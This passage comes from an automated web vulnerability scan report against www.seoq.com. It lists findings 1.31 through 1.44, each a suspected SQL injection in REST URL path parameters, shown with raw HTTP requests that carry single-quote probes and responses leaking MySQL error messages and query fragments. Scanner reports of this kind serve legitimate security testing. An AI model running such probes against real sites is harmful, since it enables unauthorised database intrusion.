<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.31. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2270'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:01 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.32. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2270/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2270/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:27 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.33. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2271'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:08 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.34. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2271/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2271/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:33 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.35. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2272'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.36. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2272/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2272/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:23 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.37. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2837'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.38. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2837/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2837/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:16 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.39. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2838'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:43 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.40. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2838/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2838/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:01 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:01 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.41. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2839'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.42. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2839/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2839/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:10 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.43. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2840'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.44. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2840/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2840/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
